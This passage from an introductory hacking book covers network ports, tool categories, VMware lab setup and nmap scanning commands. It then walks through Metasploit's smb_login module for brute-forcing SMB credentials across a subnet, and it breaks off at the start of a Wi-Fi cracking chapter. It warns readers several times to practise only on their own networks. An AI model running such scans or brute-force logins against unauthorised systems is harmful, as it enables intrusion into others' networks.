-Port 443: HTTPS (Hyper Text Transfer Protocol Secure — encrypted 
HTTP) 


-Port 22: SSH (Secure SHell — used to remotely run command line 
procedures) 


-Port 53: DNS (Domain Name System - used to bind IP addresses to 
URLs) 


-Port 547: DHCP Server (Dynamic Host Configuration Protocol - 
automatic IP address assignment) 


As you can see, each network protocol is assigned its own unique port 
number. These ports provide a way to handle various types of traffic 
differently. For example, if I didn’t want anyone to download files 
from a personal file server I was hosting on my network, I would 
block connection attempts on port 20 and 21 (FTP). This is an 
extremely basic example, but understand that if you see a host with an 
open port, that host will accept connections using that specific type of 
traffic. As another example, consider a web server that hosts a 
website. It will have either port 80 (HTTP) or port 443 (HTTPS) open, 
and clients can make a connection on those ports with the server to 
download the webpages to their browser. 


These ideas bring us to the next important concept: firewalls. 


The term ‘firewall’ is thrown around in the movies a lot, but most 
people don’t understand what they do. Though they have many 
advanced features, one of a firewall’s most basic functions is to permit 
or deny traffic to a network. Firewalls in home environments act as a 
single point of failure - meaning that all of the data in transit to/from 
the local network needs to first pass through the firewall. Because it 
acts as the only way into a network, the firewall can prevent hackers 
from making connections on specified ports to protect the local 
network. 


This concept refers to a hardware firewall, but there are software 
firewalls as well. For example, just consider the program adequately 
named Windows Firewall. It is a piece of software that will prevent 
the networking card in your computer from making connections on 
any of the ports you choose to block. We will see how to scan a target 
system later with a port scanner to see which ports are open and 
potentially exploitable. 


You should also know how to run a ping as well as view your IP 
address, subnet mask, and MAC address. These are extremely simple 
commands, and they are used frequently by networking security 
professionals. They are all run from the command prompt, so in 
Windows open up the command prompt by searching for it or hitting 
your Windows key and typing ‘cmd.’ The application’s icon is a black 


box, and once you run this program you see a prompt with a blinking 
underscore. 


To view your IP address, subnet mask, and default gateway, just type 
ipconfig into the command prompt. On the other hand, if you want to 
see your MAC address, just type ipconfig /all into the command 
prompt. If you are using a Mac or Linux computer, the command is 
only slightly different. On these systems the command is ifconfig. 


In Summary 


Please understand that we could go much deeper into these topics. In 
fact, there have been entire books written about some of these 
subjects, but they are too advanced for a beginner and lie outside the 
scope of this book. The idea is to give you a working knowledge of 
these ideas to facilitate your hacking and penetration testing 
endeavors. However, if you want to further your knowledge on these 
concepts, it will only help you become a better hacker. Now that you 
know what IP addresses, MAC addresses, ports, and firewalls are, we 
can move on to more advanced topics. 


Chapter 6 - The Hacker’s Tool Belt 


Hackers have a lot of tools in their tool belt that the average user 
hasn’t even heard of. These tools aren’t incredibly special or secretive, 
but most people simply don’t understand what they are or how to use 
them. The honest truth is that there are boatloads of different tools 
out there that can be used to break into a system or be used to identify 
vulnerabilities. 


Oh, and guess what? Surprisingly enough, many of them are 
completely free to use. Part of the reason many of these tools are free 
to use stems from the fact that many of the tools were written for 
Linux, and the vast majority of Linux software is free of charge 
because it is protected by the GNU license. 


Some of the most popular types of hacking tools that we’ll take a 
hands-on look at in this guide include: 


-Vulnerability scanners - we'll take a look at one called OpenVAS later 
in this book 


-Port scanners — we’ll also see how to use a port scanner called NMAP 


-Packet sniffers — this software listens to and records all of the 
information flowing over your network, and we'll use one later for a 
man-in-the-middle attack -demonstration 


-Password crackers — these tools are used to uncover the password to a 
system 


While this certainly isn’t a comprehensive list of the tools a hacker has 
in their tool belt, these are certainly some of the most popular and 
most important tools you need to be aware of. Let’s take a closer look 
at each one of these types of tools in detail. 


Vulnerability Scanners 


Vulnerability scanners were originally designed to help white hat 
hackers find potential security holes in their computing systems to 
plug up the security holes before a black hat hacker could find a way 
to penetrate the system. However, these scanners can be used for both 
good and evil. 


Black hat hackers can easily leverage a vulnerability scanner to find a 
weakness in a network, server, or host to facilitate an attack. And 
these scanners are pretty easy to use, too. Though some of the fine- 
tuning and tweaking of the scan you want to perform can get a little 
complex, by and large all you need to do is point the scanner at a 
target and click a button. But a vulnerability scanner on its own isn’t 
very dangerous. A black hat hacker will then need to use other types 
of software in order to take advantage of the vulnerabilities found 
with the scanner. Vulnerability scanners are really only used to 
identify weaknesses, plain and simple. 


Later in this book we’re going to go through the installation process of 
one such scanner named OpenVAS. We will be installing it in a Linux 
environment, and the installation process is the hardest part. After we 
run through the demo later in the book, all you need to do is supply 
an IP address and click a single button. Once the scanner is up and 
running, it is ridiculously easy to use. 


Pros of Vulnerability Scanners: 


-Help make systems more secure by identifying weaknesses that an 
administrator or security expert can then address and take care of 


-Mitigates the risk of hackers taking advantage of a system 


-They are fun to use! 


Cons of Vulnerability Scanners: 


-Sometimes they are not perfect and have the potential to miss the 
latest system vulnerabilities 


-They rely partially on a database of vulnerabilities that needs to be 
continuously updated 


-Hackers can take advantage of them to find ways to break into a 
system 


Port Scanners 


A port scanner is basically a software utility that can be used to 
determine which ports a host is accepting connections on. For 
example, if I wanted to see if I could pull up a web page from any 
hosts on my network, I would scan my subnet to see if any hosts have 
port 80 open. But this is a basic example. 


The information obtained from a port scanner can help attackers read 
between the lines and determine the purpose of a host on their 
network. For example, if a port scanner showed that a host had port 
9100 open, you could reasonably assume that the host you scanned is 
either a printer or a print server since port 9100 is used for printing. I 
know, I know, printers are boring. But it is amusing to think that you 
could send print jobs to your neighbor’s printer and print anything 
you wanted to after identifying their printer with a port scanner (don’t 
actually do that, it’s just funny to think about). 


But think how far an attacker could take this concept. By identifying 
the services that are running on a host, they can determine what type 
of server they are dealing with, whether or not they have found an 
infrastructure device like a router, switch, or firewall, or find ways to 
attack end user computers by making connections on their active 
ports. 


Now take a moment to consider things from a white hat perspective. 
An ethical hacker could use a port scanner to verify that all of the 
ports on a network that should be closed are actually closed. It is a 
useful verification tool that can be used to prevent vulnerabilities. 


Layer 4 Scanners 


Remember how important I told you the OSI model is? Well there is a 
whole class of scanners that targets layer four (the transport layer) of 
the OSI model specifically. These scanners look for minute details in 
the operation of layer 4 protocols such as TCP (Transmission Control 
Protocol) and UDP (User Datagram Protocol) to find weaknesses in 
hosts. The inner workings of these protocols are actually quite 
complex, but realize that there is a process called a handshake that two 
hosts make before they form a connection. By tricking and 
manipulating the handshake process, attackers can cause serious harm 
to systems in the form of a DoS (Denial of Service) whereby an 
attacker breaks the logic in these protocols to cause a host or service 
to stop functioning or severely underperform. 


Packet Sniffers 


Packet sniffers are invaluable tools that are able to capture, store, and 
display all of the information that is flowing over a cable or 
transmission medium such as a wireless interface. By using a packet 
sniffer, you’ll be able to see in great detail all of the conversations that 
computers are having with each other. 


You can see connection attempts, file transfers, and even Google 
searches. Packet sniffers are especially dangerous when data is being 
sent in plain text, which is another way of saying that the data isn’t 
encrypted before it is sent to another host. So, for example, if your 
username and password weren’t encrypted before being sent to a 
server, and attacker can leverage a packet sniffer to capture that data 
and steal your username and password. 


But some packet sniffers, such as Wireshark, are difficult for newbies 
to read because they simply don’t understand how the various 
protocols operate. A packet sniffer will show an attacker the nitty- 
gritty details of a traffic stream’s raw data. More specifically, it can 
show you the IP address of a host that initiated a connection, how 
another host responded to the connection attempt, any data that was 
sent during the session, and what type of data is flowing over the 
connection via its port number. 


Have you ever wondered how ISPs can see what type of data is 
flowing over their network and determine which hosts are visiting 
specific websites? Packet sniffers are but one tool among many that 
they use achieve this goal. 


Password Cracking Utilities 


Hackers frequently use tools called password crackers to gain 
unauthorized access to computer systems. Cracking is basically a term 
used to describe the process of obtaining a password that is hidden or 
stored in a protected format. For example, there are wireless password 
cracking tools that allow an attacker to gain the password to a Wi-Fi 
network without needing to know the security key upfront. 


But there are many other types of passwords and methods used by 
these utilities. Some people have heard of a brute force password 
attack before, and these can a long time to perform. In the brute force 
process, a computer will try to guess every conceivable password to 
gain access to a system by trying every unique combination of 
characters. 


In addition, there are also dictionary based attacks that are useful for 
breaking weak passwords. These types of attacks take a more 
pragmatic approach to cracking a password because they try 
passwords based upon a dictionary of common and popular phrases. 
Typically an attacker will try a dictionary attack before a brute force 
attack because there is a higher chance of cracking a password with a 
dictionary based attack. Brute force attacks have one colossal 
downfall: they can be extremely slow due to the millions and millions 
of combinations they need to try to be successful cracking passwords. 
The process can last for days. Dictionary based attacks, on the other 
hand, are typically much faster because they don’t have near as many 
password combinations to attempt. 


Chapter 7 — Utilizing VMWare 


One of the easiest ways for you to build different environments that 
you can learn to hack in is by using VMWare. But what does this 
software actually do? VMWare allows you to run code called ‘virtual 
machines.’ Essentially it has the power to virtualize entire operating 
systems so you don’t have to wipe the operating system off your host 
computer and install a completely new one to get started hacking. 
Sometimes newbies who want to get started hacking may try to install 
an operating system such as Kali Linux in addition to their host 
operating system such as Windows. The only problem is that one 
configuration mistake with the installation could cause a user to lock 
themselves out of their Windows operating system completely. 


Other times they may even accidentally repartition their hard drive 
and wipe out all of their old files. This is a huge headache, but 
installing VMWare will solve these problems and allow you to run 
multiple operating systems simultaneously. The good news is that 
VMWare Player is free to use and easy to install. You can find the 
release notes and download link for VMWare Player on VMWare’s 
website, and you will want to download and install this program for 
some of the demos later in this book. 


It is assumed that you have the ability to install basic software, so we 
won't get into the VMWare installation process. It’s pretty darn 
simple, and all you need to do is follow the installation wizard. Also 
you could be installing this software on different platforms, and the 
installation steps would change. If you need help installing this 
software, you can find help on the VMWare website for your given 
operating system. 


After you have downloaded and installed VMWare, you need to 
download operating system images to run in VMWare. More 
specifically, you should go ahead and download Ubuntu Linux and 
Kali Linux images. You can find Kali Linux images for VMWare and 
Ubuntu images for VMWare for free online. After you have 
downloaded an image, to install it you need run VMWare Player. Then 
click on Player = > File = > New Virtual Machine and browse to the 


image you downloaded. Alternatively you can just hit ctrl + N after 
you have opened VMware. When you first install a new image in 
VMWare, it will ask you to name it. Personally, I just name the virtual 
machine the same name as the operating system to keep things 
straight. 


Once the image has been successfully downloaded and you install it in 
VMWare, the VMWare application will go through the installation 
procedure exactly as if you were trying to install that operating system 
on your computer, but it will install it within your host environment. 
As you proceed through the installation process, portions of the 
procedure will ask you if you want to install a variety of packages. 
Make sure that you select all of the packages that are described as 
‘security’ or ‘penetration testing’ packages. If you fail to install these 
packages, you will need to go through the installation processes 
individually for the demonstrations that I walk you through later such 
as NMAP. If you have any trouble installing your operating system in 
VMWare, all you need to do is follow the guide on the Kali Linux or 
Ubuntu sites. 


You should also have an idea of the intended uses for each operating 
system. Ubuntu is designed to be an easy to use replacement for other 
desktop operating systems such as Windows. It is well-suited for 
everyday use, and you don’t need to be a Linux expert to use it. As 
such, it is a great environment to expand your Linux skills and it offers 
plenty of different penetration testing tools, scanners, and hacking 
programs. However, you should also know about Kali Linux. Kali was 
specifically designed with hacking in mind, and the security packages 
contained in the VMWare image are mostly geared towards providing 
users with tools that facilitate hacking. However, it is a little more 
challenging to use if you haven’t been exposed to Linux already, and 
much of its power is found at the command line. 


Each different VMWare image and Linux distribution has different 
default usernames and passwords. You can check the defaults on the 
website where you downloaded the code image, but they are most 
typically ‘root’ and ‘toor’ or ‘username’ and ‘password.’ If you wish, 
you can create additional user accounts but this isn’t necessary as we 
will only be using these operating systems to run some demos. 


Though I would personally recommend that you take full advantage of 
VMWare to virtualize Linux operating systems to provide you with 
hacking tools, you do have an alternative. Many Linux distributions 
can be downloaded and burned to a CD or DVD. These are called ‘live 
boot’ images because all you need to do is pop the disk in your 
computer, reboot it, and voila. Your computer will boot to the Linux 
operating system contained on the disc. Some versions of Linux are so 
small and lightweight that you can even boot from a flash drive. 
However, there is one caveat with these live boot images. Your 
computer may or may not be configured to boot from the hard drive 
before the disc drive or USB port. If this is the case for your computer, 
you would first need to change the boot order of these devices. It is a 
little difficult to explain this procedure since every make and model of 
computers and laptops have a slightly different process, but you can 
Google this procedure for your make and model of computing device 
to change the boot order to accommodate a live Linux CD or DVD. 
Personally, I prefer VMWare because you can switch between your 
host operating system (Windows in my case) and your virtual 
machines without needing to reboot your computer. 


Lastly, if you want to get your feet wet hacking, I highly advise you 
take the time it takes to get your Linux environments setup. Most of 
the demos we will be running in this book will be from a Linux 
operating system. Note that while many of these tools have versions 
that work with Windows, Linux is still the preferred operating 
environment for hackers because it is more secure and offers access to 
more code and hacking tools than Windows does. 


Chapter 8 — Introduction to Ping Sweeps, Port 
Scanning, and NMAP 


It’s finally time to dig into the good stuff! In this chapter I will walk 
you through how to perform network scanning and reconnaissance 
techniques using a program called NMAP. This is the program that the 
hackers in the movies like to flaunt, and it is fairly easy to use. The 
whole point of NMAP is to feel out a network and scan it to discover 
active devices, open ports, and other vital information such as which 
operating system the host is running. In the network penetration and 
hacking world, this is referred to as network mapping, footprinting, or 
reconnaissance. 


Without these tools, you are essentially blind on any given network 
and you would have a hard time attacking anything since you 
wouldn’t be able to see any targets. Also, think just how important it 
is to know what operating system a host is using. Exploits come and 
go, and new ones are constantly surfacing as new operating systems 
are developed or patches are applied. For example, with each new 
version of Windows, there are countless security vulnerabilities that 
are slowly identified and patched over time. By knowing the operating 
system version on a host, you could use a tool such as Metasploit to 
search for active vulnerabilities and exploit them. 


Once an attacker has gained access to a network, there are a lot of 
things they can do to prepare an attack. The following are some of the 
more common footprinting goals: 


-Gather information 
-Find the local subnet’s IP address structure 
-Search for networking devices such as a router, switch, or firewall 


-Identify active hosts on the network such as end user workstations 


-Discover open ports and access points 


-Find out detailed information regarding the operating systems on 
active machines 


-Discover the type of device such as a laptop, tablet, smartphone, or 
server 


-Map the local network 


-Capture network traffic 


Even if you don’t have an advanced degree in computing, Linux 
software and network penetration programs are becoming so 
sophisticated that it is unbelievably simple to carry out these 
footprinting tasks. The only things you need are a Linux system (see 
chapter 6), the right software, a rudimentary understanding of 
networking concepts (see chapter 5), and a guide. The rest of this 
chapter will focus on using NMAP to feel out and map a network. 
Contrary to the old adage, remember to try this at home! Don’t use the 
knowledge in this chapter to start poking around the network at your 
office or in a public setting. Respect others’ privacy or there may be 
harsh consequences. 


Ping Sweeps 


The first and easiest technique you need to understand is called a ping 
sweep. A ping sweep is a useful way to identify active machines on a 
given subnet. If you aren’t familiar with a ping operation, let’s take a 
moment to explain this concept. A ping is a command from ICMP 
(Internet Control Message Protocol), and it is frequently used to 
determine if two hosts have an end-to-end connection. The host that 
initiates the ping sends small packets of information via what’s called 
an ICMP echo request. If the target host is online and has a 
connection, it will reply to the host who initiated the ping. This will 
show you that the host is online and that it isn’t suffering from 
connection problems over the network between the two hosts. 


If you really wanted to, you could manually go through each IP 
address on your network and ping it from your computer to see what 
IP addresses other hosts on the network are using. In reality though, 
this simply isn’t feasible. It would be very tedious and time consuming 
trying to ping hundreds of individual IP addresses to see if any hosts 
are online. This is why ping sweeps are so useful — they allow you to 
ping every valid IP address on a subnet automatically. After the sweep 
has been completed, NMAP will return a list of all the addresses that 
replied to the ping and allow you to see the IP addresses of other 
active hosts on the scanned network. 


However, there are a couple caveats to ping sweeps. They don’t 
always show you every single host attached to a network. There are a 
few reasons why a host might not respond to a ping sweep. Firstly, it 
could be possible that a host’s network card is faulty or broken in 
some way. Secondly, there could be problems on the network between 
your host and the target subnet that prevent the ping from completing 
successfully. Lastly (and most importantly), network admins choose to 
configure hosts to not respond to pings for the sole purpose of 
protecting them from being identified by a ping sweep. In some 
instances, your ping might pass through a firewall that doesn’t allow 
ICMP traffic, too. 


These are the exceptions, though, and not the rule. It is rare that a 


host would not respond to a ping, and the vast majority of active hosts 
will show up in a ping sweep. This is especially true if you are 
performing a ping sweep on the subnet that your computer is directly 
connected to. 


Operating System Identification 


Yet another useful feature of the NMAP utility is the ability to identify 
the operating systems that active hosts are using. Though you may not 
think so at first, this is actually some critical information. After you 
know what operating system and code version a host is using, you can 
then search databases using tools such as Metasploit to identify 
weaknesses and vulnerabilities. Furthermore, NMAP will be able to 
tell you the model of device a host is using. This is also critical 
because it will help you discern what type of devices are present such 
as host computers, tablets, phones, infrastructure devices, hardware 
appliances, printers, routers, switches, and even firewalls. 


Port Scanning 


Port scanning is a little different from a ping sweep. With port 
scanning, the goal is to find what port(s) are open on a whole subnet 
or a single host. For example, you could perform a port scan on your 
local subnet to see if any hosts are accepting connections on port 80 
(HTTP). This is a great way to see if you can access any networking 
devices such as a wireless router, printer, or a firewall. Because these 
types of devices typically have web configuration interfaces, any hosts 
that are accepting connections on port 80 (HTTP) will show you a 
login prompt if you type their IP address into a web browser. For 
example, if your port scan revealed that the host 192.168.1.1 (this is 
most likely the default address of your wireless router) is accepting 
connections on port 80, you could reach its login interface by typing 
http://192.168.1.1 in your web browser. This will initiate a 
connection on port 80 for the host 192.168.1.1 (see chapter 5 for 
networking fundamentals, IP addresses, and ports). 


It is likely that the administrator changed the default username and 
password for that device, but you would be surprised how frequently 
people fail to do this because they are inexperienced, lazy, or just 
plain ignorant of the massive security risk they encounter by leaving 
the username and password set to default values. If you wanted to, 
you could even use NMAP to find what type of firmware the 
networking device is running as well as the model number. Then all 
you need to do is perform a quick Google search to find the default 
values and attempt to login to the device. But this is just one simple 
example of port scanning. You could even scan a single host to see all 
of the ports that are accepting connections. And port scanning goes 
well outside the realm of scanning port 80 to see if you can pull up a 
web interface. Some ports can be used to deliver types of code that 
will take advantage of a flaw in a protocol or system to escalate an 
attacker’s privileges or even deny that target from using network 
services. 


NMAP Footprinting Procedures: Installing NMAP 


Before we begin, there is one last thing we need to do to configure 
VMWare connectivity. VMWare uses the idea of virtualized network 
adapters, and the default setting won’t put your virtual machine in the 
same subnet as your host operating system. Simply click on the 
‘settings’ tab of the VMWare application and find the configuration 
option for your ‘network interface.’ Now select the option to put it in 
bridged mode. 


To verify that your host operating system and VMWare operating 
system are on the same subnet, just run the ipconfig command from 
the Windows command line or the ifconfig command on Linux and 
Mac systems. Then, just make sure they match and belong to the same 
subnet. 


To begin these demonstrations, you are going to want to fire up 
VMWare and boot your virtual Linux system. NMAP should already be 
installed if you selected the security packages as recommended earlier, 
but if you failed to do this there is good news. It is pretty darn simple 
to install NMAP. 


Open the terminal in your Linux distribution (either Kali or Ubuntu). 
Try running the following command to see if NMAP was installed 
successfully. 


- sudo nmap -sP 192.168.1.0/24 


Don’t worry about what this command does, we’ll dig into that 
information shortly. If it wasn’t setup properly, the terminal will spit 
out an error that says NMAP isn’t installed. Don’t worry, this isn’t a 
big problem. We just need to run the following command to download 
and install NMAP: 


- sudo apt-get install nmap 


It will take only a short while to download and install, and you should 
receive confirmation from the terminal that the operation completed 
successfully. Now we can take a closer look at ping sweeps. 


NMAP Footprinting Procedures: Ping Sweeps 


Now that you have a good idea of what ping sweeps do, it’s time for a 
demonstration! Though you can download it for Windows, I would 
personally recommend you heed my advice and try your hand at 
installing VMWare to get used to a Linux environment. The following 
is the quick and easy 4 step process you need to run a ping sweep in 
Linux using NMAP. Again, remember that this tool is used to identify 
active hosts on a network. 


Step 1 - Run VMWare and boot to your Linux operating system. 


Step 2 - Open the terminal (a.k.a. the shell). This can be found by 
performing a search for ‘terminal’ after clicking the start button. If you 
failed to install the GUI (Graphical User Interface) during your 
installation, you would have booted to a black screen with a blinking 
cursor. This is the same as the terminal, so either will work for our 
purposes since we are working from the command line like those 
mythical hackers in the movies. However, if you feel uncomfortable in 
this environment and you want a GUI screen, just run the startx 
command. 


Step 3 - Run the following command: 


- sudo nmap -sP 192.168.1.0/24 


In this command, 192.168.1.0/24 is an example subnet. It is entirely 
possible that your computer is on a different subnet. To discover 
which subnet you are using, run the ipconfig command in Windows 
or ifconfig on Linux and Mac systems. These commands will show 
you what IP address and subnet mask your computer is using. For 
example, if your IP address is 192.168.113.201 and your subnet mask 
is 255.255.255.0 (the same as /24), the command would be changed 
as follows: 


- sudo nmap -sP 192.168.113.0/24 


Now NMAP will work its magic and automatically perform a ping 
sweep across all valid IP addresses on the subnet you specified — 


which is 192.168.113.0/24 in this example. 


Step 4 — Read the results. After the operation completes, NMAP will 
return a list of IP addresses that successfully responded to the ping 
sweep. Be warned, though. Depending on the size of the subnet and 
your local computing resources, it could take a little while for the 
operation to complete. Just be patient and let NMAP do its thing. Now 
you have a little bit of ammunition to further your reconnaissance 
efforts. You can use the IP addresses found with the ping sweep as a 
parameter in the following commands to identify that host’s open 
ports and what operating system it is using. 


NMAP Footprinting Procedures: Port Scanning 


Now it’s time to learn how to identify which ports are open on a 
target network or device. Just think how useful this is for ethical 
white hat penetration testers. This tool will essentially let them verify 
that hosts aren’t accepting connections on dangerous ports that should 
be blocked by a firewall, but realize this tool is a double-edged sword. 
Black hat hackers can use this tool to find open ports in an effort to 
find a way to break the system. Because you should have already run 
a ping sweep, I won’t list the steps in this demo. Just test out the 
command from the terminal that you already have open. The syntax 
of this command is as follows: 


- sudo nmap -p [PORT] [TARGET] 


In the command syntax, [PORT] is a numeric value representing the 
port you want to scan. If you wanted to scan for hosts accepting HTTP 
connections, you would set this value to ’80.’ The [TARGET] field 
specifies which host or subnet you want to scan. If you wanted to scan 
a single host, you would omit the subnet mask. If you wanted to scan 
your entire subnet, you would include the subnet mask. Consider the 
following two examples: 


1. sudo nmap -p 80 192.168.113.21 (this scans the host with the 
address 192.168.113.21) 


2. sudo nmap -p 80 192.168.113.0/24 (this scans the entire 
192.168.113.0/24 subnet) 


Interestingly enough, this command won’t only show you if the 
desired port is open or closed. It will also provide the host’s MAC 
address and display the OUI (Organizationally Unique Identifier) for 
that MAC address. If you find that port 80 is open, go ahead and try to 
pull up the web configuration interface in a web browser just for 
kicks. Also, take the time to verify that your hosts that have port 80 
open aren’t using the default username and password values. 
Remember, you should be doing this on your own home network 
instead of a network where you don’t have the authority to be running 
port scans! 


NMAP Footprinting Procedures: Operating System 
Identification 


Last but not least, we’re going to learn how to use NMAP to identify a 
host’s operating system. The syntax for the command is extremely 
simple and follows a similar structure compared to the previous 
examples. The only difference is that you use the ‘-O’ option in the 
command. Consider the following example where we scan a target 
host to uncover what operating system is running on the target: 


- sudo nmap -O 192.168.113.21 


This example only scans the 192.168.113.21 host, but you could scan 
an entire subnet as we did in the preceding examples. Then the 
command will provide you with detailed information regarding the 
type of operating system used, its version number, and any patches 
that have been applied to the host operating system. 


In Summary 


Using NMAP, you can easily map a local network topology, identify 
active hosts with a ping sweep, scan for open ports, and identify 
operating systems. Note how short and sweet these commands are. 
These commands provide a high amount of leverage for an attacker 
because they are so simple to use and NMAP will do all of the dirty 
work for you. 


The next time you see a hacker in a movie, take a glance at their 
computer screen. More often than not, they are going to be using 
NMAP. Now you can actually decipher the cryptic text on their 
monitor! 


Chapter 9 — Using Metasploit to Hack Devices 


Now that we have taken a look at how to use command line tools via 
the terminal in Linux, things are going to heat up a little. While NMAP 
is a fantastic tool to map a local network and gather information 
about hosts, Metasploit is a tool that is designed to help you actually 
break into a system and exploit vulnerabilities. If you installed the full 
version of Kali Linux in the VMWare chapter and included the right 
security packages, you should already have Metasploit installed. In 
fact, it is included in many different Linux operating systems. Note 
that there is a version for Windows, but it is natively a Linux program 
and running it on Linux is preferred. Please understand that 
Metasploit is an extremely advanced tool, and there have been entire 
books and manuals written about it. I couldn’t possibly hope to 
elaborate on every exploit found within Metasploit, and the fact is 
that they are constantly updating the vulnerabilities, payloads, and 
exploits that can be taken advantage of. But I do want to show you 
some basic commands, how to navigate through the Metasploit 
prompt, and show you a basic demonstration of how Metasploit can 
be used to hack a computer. 


Also, note that I intentionally showed you how to use NMAP before 
Metasploit. As it turns out, you can actually run NMAP commands 
from the Metasploit prompt — but it goes a little deeper. You can even 
save the data collected from your scans in a Metasploit database to be 
used as input for other Metasploit commands. 


But just what exactly is Metasploit? Metasploit is a vulnerability 
framework that is huge in the hacking and network penetration world, 
and I definitely recommend using this tool. Newbies have a hard time 
wrapping their heads around the fact that Metasploit is a framework 
and not a single stand-alone application. A lot of hackers use the code 
found in this handy tool to build and develop their own custom- 
tailored attacks. For example, if you were a hacker investigating and 
studying the vulnerabilities and exploits on the latest version of 
Windows, you would use Metasploit to find and take advantage of 
security flaws. 


Note that there are a few different versions of Metasploit and some are 
free while others cost money. Though you should run it in a Linux 
environment, there is a Windows version for those of you who are too 
scared of the Linux shell. For all practical purposes, you are only 
going to want to use the free version since the paid version costs 
$5,000 dollars per year per user. 


Also know that because of the nature of the Metasploit program, you 
are going to need to turn off your software firewall or allow an 
exception because Windows will flag the program as some sort of 
virus. Rest assured, they are a credible and reputable organization — 
Windows is just wrong. Also, just like in the NMAP chapter, you are 
going to want to make sure that the VMWare network interface is 
configured for bridged mode. 


Lastly, you are going to need to be familiar with some terminology 
used in Metasploit such as payloads, exploits, listening, Metasploit 
interfaces, and have a general understanding of the database concept 
before moving forward. Payloads refer to sections of executable code 
that can be delivered to a target. After the payload has been 
successfully sent to its intended target, you can then run commands to 
further take advantage of that computer. Exploitation, on the other 
hand, simply means taking advantage of a known system vulnerability 
by using Metasploit. In addition, listening means that Metasploit is 
collecting and analyzing network traffic that matches certain criteria, 
much like a packet sniffer such as Wireshark. Furthermore, Metasploit 
interfaces include the MSFconsole as well as Armitage, but an 
interface could also refer to one of several network interfaces on your 
computer such as the wireless interface or the Ethernet port. 


To round up or discussion of basic Metasploit concepts, you need to be 
aware of the Metasploit database. The database is one of the features 
of this software that makes it so powerful, and you can save vast 
amounts of data you collect about different networks within the 
database. Not only will it help you organize the information you 
collect, but you can actually run commands on entries found in the 
database to ease the automation process. That way you don’t have to 


run the same command on every host you discovered using a tool such 
as NMAP. 


Basic Metasploit Commands 


To begin the hacking demonstration, you need to be familiar with 
several basic Metasploit commands and know what they do. First of 
all, you need to know how to reach the Metasploit prompt. To begin, 
open the terminal (or the shell — they’re the same thing) and type the 
following: 


msfconsole 


If you have properly installed the Metasploit framework, you should 
reach a prompt that displays ‘msf’ followed by a greater-than sign. 
From this prompt, there are a variety of basic commands you can use 
to get help, show additional commands, set targets for attacks, set 
ports for exploits, and many other useful tools and features. The 
following is a list of the basic Metasploit commands and their 
functions: 


-show options - lists available options to configure Metasploit 


-set rhost 192.168.1.3 — sets the remote host (target) of an attack to 
192.168.1.3 


-set lhost 192.168.1.2 — sets the attacking local host of an attack to 
192.168.1.2 


-set rport 80 - sets the port number of the target host to 80 

-set lport 53 - sets the local port of the attacker to 53 

-set payload [PAYLOAD] - allows a user to execute a given payload 
-unset rhost — removes a remote host’s IP address 

-unset lhost — removes a local attacking host’s IP address 

-exploit [EXPLOIT] - allows an attacker to execute a given exploit 
-back - returns a user to the initial Metasploit screen 

-sessions -l — displays active sessions 


-sessions -i [ID] — goes to an active section where [ID] is a numeric 
value taken from the previous command 


To gain a better understanding of how Metasploit can be used to 
uncover vulnerabilities, let’s take a look at a module that scans hosts 
for SMB (Server Message Block protocol). While these types of 
vulnerability scanners and exploit techniques are fun in a personal 
setting and very beneficial for learning how to use Metasploit, this 
technique in particular is considered to be a very “noisy” scan. That is 
to say that it raises red flags that would draw the attention of a 
security professional if you performed them in an environment where 
you have no business scanning for vulnerabilities. 


Start from the MSF console and run the following command to enter 
the exploit’s command prompt: 


- use auxiliary/scanner/smb/smb_login 


From here you can view all of the parameters and options to configure 
before running the scan with the following command: 


- show options 


You'll notice a lot of fields that can be set to various values to fine- 
tune the scan. Most importantly, note that one of the fields is labeled 
as “Required.” These fields need to have a value in them or you won’t 
be able to properly run the scan. To change the value in one of these 
fields, simply use the set command. For example, if I wanted to 
change the target in the rhosts (Remote Hosts) field, I would run the 
following command: 


- set rhosts 192.168.1.0/24 


This command will set the target to the entire subnet. For the SMB 
login vulnerability, you would also need to set values such as 
SMBUser (the username) and SMBPass (the password). After all of the 
required fields have values and you have selected your target, 
username, and password, you can then run the vulnerability scan with 
the following command: 


A run 


After you execute this command, you will see output of Metasploit 


trying to take advantage of the SMB vulnerability for every host in the 
rhosts value. If you set it to your entire local network, it will run 
through each individual IP address on the subnet and attempt to login 
using the vulnerability. 


You might also have noticed that one of the fields is labeled 
BRUTEFORCE SPEED, which will tweak how fast the software will run 
through a brute force password attack on the targeted hosts. 


This is yet another example of a Metasploit exploit, but there are 
many, many more. There are an unfathomably high number of 
exploits on the latest releases of operating systems and network 
protocols, and users who excel at using Metasploit can do some real 
damage. This example is just the tip of the iceberg, but some of the 
attacks and exploits are much more complex than our simple 
demonstration. Some of them do require more background knowledge 
to understand the attack, but by and large even newbies can run many 
of these attacks with little to no knowledge of the protocol’s or 
exploit’s internal mechanics. 


Chapter 10 — Wireless Password Hacking 


If you didn’t know already, there are methods of cracking wireless 
passwords so you can gain access to wireless networks when you don’t 
have the security key. Again, please only try this on your home 
networking equipment. Though it may be tempting to try to use this 
method to hack into your neighbor’s wireless network to get free Wi- 
Fi, this is a huge breach of privacy and it is not legal to do so. In 
addition, it is actually a pretty simple process to break weak Wi-Fi 
encryption and login to a wireless network. However, there are a 
couple caveats. 


You see, there are several different types of Wi-Fi encryption. The two 
easiest encryption standards to crack into are WEP (Wired Equivalent 
Privacy) and WPA (Wi-Fi Protected Access), but it is also possible to 
crack WPA2 (Wi-Fi Protected Access 2). Though some wireless routers 
implement stronger Wi-Fi security standards that are more difficult to 
break into, your average home user doesn’t know the difference and 
typically doesn’t select the right protocol based on their knowledge of 
security. 


But why would you want to hack into a wireless network in the first 
place? After all, an expert hacker probably has bigger fish to fry than 
his neighbor who is using the Internet to look up the latest sports 
stats, right? Sure, that’s true enough, but imagine the havoc an 
experienced hacker could wreak upon a business network that uses 
weak security. While it’s true that most businesses — even small 
businesses — use IT staff that are well adept at implementing the 
strongest Wi-Fi security available to date, there are a few scenarios 
that happen all too often in a corporate setting. For example, consider 
a commercial establishment that provides both a company-wide Wi-Fi 
signal as well as a hard-wired Ethernet port for each of their 
employee’s offices. 


Sometimes employees don’t like to follow the rules and adhere to their 
company’s security policies. Many companies forbid plugging in a 


networking device to an Ethernet port, but often times network 
personnel will make a mistake in configuring the network - giving an 
employee the opportunity to connect a wireless router to their 
Ethernet port. Usually employees want to have their own wireless 
signal because they think it will give them faster Internet speeds. 


Whether or not it will actually increase their speed, this scenario 
happens all the time. And the problem is that it leaves a gaping 
security hole for hackers to take advantage of them. Because non- 
technical users don’t understand the details of Wi-Fi security 
standards, they may accidentally configure their wireless router for 
